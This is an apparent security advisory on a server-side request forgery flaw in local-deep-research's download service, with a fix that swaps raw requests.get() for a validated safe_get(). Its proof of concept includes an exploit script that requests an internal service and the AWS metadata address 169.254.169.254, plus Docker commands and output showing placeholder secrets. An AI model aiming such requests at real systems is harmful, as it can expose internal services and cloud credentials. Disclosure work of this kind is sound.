+ "details": "## Summary\n\nThe download service (`download_service.py`) makes HTTP requests using raw `requests.get()` without utilizing the application's SSRF protection (`safe_requests.py`). This can allow attackers to access internal services and attempt to reach cloud provider metadata endpoints (AWS/GCP/Azure), as well as perform internal network reconnaissance, by submitting malicious URLs through the API, depending on the deployment and surrounding controls.\n\n**CWE**: CWE-918 (Server-Side Request Forgery)\n\n---\n\n## Details\n\n### Vulnerable Code Location\n\n**File**: `src/local_deep_research/research_library/services/download_service.py`\n\nThe application has proper SSRF protection implemented in `security/safe_requests.py` and `security/ssrf_validator.py`, which blocks:\n- Loopback addresses (127.0.0.0/8)\n- Private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)\n- AWS metadata endpoint (169.254.169.254)\n- Link-local addresses\n\nHowever, `download_service.py` bypasses this protection by using raw `requests.get()` directly:\n\n```python\n# Line 1038 - _download_generic method\nresponse = requests.get(url, headers=headers, timeout=30)\n\n# Line 1075\nresponse = requests.get(api_url, timeout=10)\n\n# Line 1100\npdf_response = requests.get(pdf_url, headers=headers, timeout=30)\n\n# Line 1144\nresponse = requests.get(europe_url, headers=headers, timeout=30)\n\n# Line 1187\napi_response = requests.get(elink_url, params=params, timeout=10)\n\n# Line 1207\nsummary_response = requests.get(esummary_url, ...)\n\n# Line 1236\nresponse = requests.get(europe_url, headers=headers, timeout=30)\n\n# Line 1276\nresponse = requests.get(url, headers=headers, timeout=10)\n\n# Line 1298\nresponse = requests.get(europe_url, headers=headers, timeout=30)\n```\n\n### Attack Vector\n\n1. Attacker submits a malicious URL via `POST /api/resources/<research_id>`\n2. URL is stored in database without SSRF validation (`resource_service.py:add_resource()`)\n3. Download is triggered via `/library/api/download/<resource_id>`\n4. `download_service.py` fetches the URL using raw `requests.get()`, bypassing SSRF protection\n\n---\n\n## PoC\n\n### Prerequisites\n\n- Docker and Docker Compose installed\n- Python 3.11+\n\n### Step 1: Create the Mock Internal Service\n\n**File: `internal_service.py`**\n\n```python\n#!/usr/bin/env python3\n\"\"\"Mock internal service that simulates a sensitive internal endpoint.\"\"\"\n\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport json\n\nclass InternalServiceHandler(BaseHTTPRequestHandler):\n def log_message(self, format, *args):\n print(f\"[INTERNAL SERVICE] {args[0]}\")\n \n def do_GET(self):\n print(f\"\\n{'='*60}\")\n print(f\"[!] SSRF DETECTED - Internal service accessed!\")\n print(f\"[!] Path: {self.path}\")\n print(f\"{'='*60}\\n\")\n \n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/json\")\n self.end_headers()\n \n secret_data = {\n \"status\": \"SSRF_SUCCESSFUL\",\n \"message\": \"You have accessed internal service via SSRF!\",\n \"internal_secrets\": {\n \"database_password\": \"super_secret_db_pass_123\",\n \"api_key\": \"sk-internal-api-key-xxxxx\",\n \"admin_token\": \"admin_bearer_token_yyyyy\"\n }\n }\n self.wfile.write(json.dumps(secret_data, indent=2).encode())\n\nif __name__ == \"__main__\":\n print(\"[*] Starting mock internal service on port 8080\")\n server = HTTPServer((\"0.0.0.0\", 8080), InternalServiceHandler)\n server.serve_forever()\n```\n\n### Step 2: Create the Exploit Script\n\n**File: `exploit.py`**\n\n```python\n#!/usr/bin/env python3\n\"\"\"SSRF Vulnerability Active PoC\"\"\"\n\nimport sys\nimport requests\n\nsys.path.insert(0, '/app/src')\n\ndef main():\n print(\"=\" * 70)\n print(\"SSRF Vulnerability PoC - Active Exploitation\")\n print(\"=\" * 70)\n \n internal_url = \"http://ssrf-internal-service:8080/secret-data\"\n aws_metadata_url = \"http://169.254.169.254/latest/meta-data/\"\n headers = {\"User-Agent\": \"Mozilla/5.0\"}\n \n # EXPLOIT 1: Access internal service\n print(\"\\n[EXPLOIT 1] Accessing internal service via SSRF\")\n print(f\" Target: {internal_url}\")\n \n try:\n # Same pattern as download_service.py line 1038\n response = requests.get(internal_url, headers=headers, timeout=30)\n print(f\" [!] SSRF SUCCESSFUL! Status: {response.status_code}\")\n print(f\" [!] Retrieved secrets:\")\n for line in response.text.split('\\n')[:15]:\n print(f\" {line}\")\n except Exception as e:\n print(f\" [-] Failed: {e}\")\n return 1\n \n # EXPLOIT 2: AWS metadata bypass\n print(\"\\n[EXPLOIT 2] AWS Metadata endpoint bypass\")\n from local_deep_research.security.ssrf_validator import validate_url\n print(f\" SSRF validator: {'ALLOWED' if validate_url(aws_metadata_url) else 'BLOCKED'}\")\n print(f\" But download_service.py BYPASSES the validator!\")\n \n try:\n requests.get(aws_metadata_url, timeout=5)\n except requests.exceptions.ConnectionError:\n print(f\" Request sent without SSRF validation!\")\n \n print(\"\\n\" + \"=\" * 70)\n print(\"SSRF VULNERABILITY CONFIRMED\")\n print(\"=\" * 70)\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n```\n\n### Step 3: Run the PoC\n\n```bash\n# Build and run with Docker\ndocker network create ssrf-poc-net\ndocker run -d --name ssrf-internal-service --network ssrf-poc-net python:3.11-slim sh -c \"pip install -q && python internal_service.py\"\ndocker run --rm --network ssrf-poc-net -v ./src:/app/src ssrf-vulnerable-app python exploit.py\n```\n\n### Expected Output\n\n```\n======================================================================\nSSRF Vulnerability PoC - Active Exploitation\n======================================================================\n\n[EXPLOIT 1] Accessing internal service via SSRF\n Target: http://ssrf-internal-service:8080/secret-data\n [!] SSRF SUCCESSFUL! Status: 200\n [!] Retrieved secrets:\n {\n \"status\": \"SSRF_SUCCESSFUL\",\n \"message\": \"You have accessed internal service via SSRF!\",\n \"internal_secrets\": {\n \"database_password\": \"super_secret_db_pass_123\",\n \"api_key\": \"sk-internal-api-key-xxxxx\",\n \"admin_token\": \"admin_bearer_token_yyyyy\"\n }\n }\n\n[EXPLOIT 2] AWS Metadata endpoint bypass\n SSRF validator: BLOCKED\n But download_service.py BYPASSES the validator!\n Request sent without SSRF validation!\n\n======================================================================\nSSRF VULNERABILITY CONFIRMED\n======================================================================\n```\n\n---\n\n## Impact\n\n### Who is affected?\n\nAll users running local-deep-research in:\n- **Cloud environments** (AWS, GCP, Azure) - attackers can steal cloud credentials via metadata endpoints\n- **Corporate networks** - attackers can access internal services and databases\n- **Any deployment** - attackers can scan internal networks\n\n### What can an attacker do?\n\n| Attack | Impact |\n|--------|--------|\n| Access cloud metadata | Potentially access IAM credentials, API keys, or instance identity in certain cloud configurations |\n| Internal service access | Read sensitive data from databases, Redis, admin panels |\n| Network reconnaissance | Map internal network topology and services |\n| Bypass firewalls | Access services not exposed to the internet |\n\n---\n\n## Recommended Fix\n\nReplace all `requests.get()` calls in `download_service.py` with `safe_get()` from `security/safe_requests.py`:\n\n```diff\n# download_service.py\n\n+ from ...security.safe_requests import safe_get\n\n def _download_generic(self, url, ...):\n- response = requests.get(url, headers=headers, timeout=30)\n+ response = safe_get(url, headers=headers, timeout=30)\n```\n\nThe `safe_get()` function already validates URLs against SSRF attacks before making requests.\n\n### Files to update:\n- `src/local_deep_research/research_library/services/download_service.py` (9 occurrences)\n- `src/local_deep_research/research_library/downloaders/base.py` (uses `requests.Session`)\n\n---\n\n## References\n\n- [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html)\n- [OWASP SSRF Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n- [AWS SSRF Attacks and IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)\n- [PortSwigger: SSRF](https://portswigger.net/web-security/ssrf)\n\n---\n\nThank you for your work on this project! I'm happy to provide any additional information or help with testing the fix.",
0 commit comments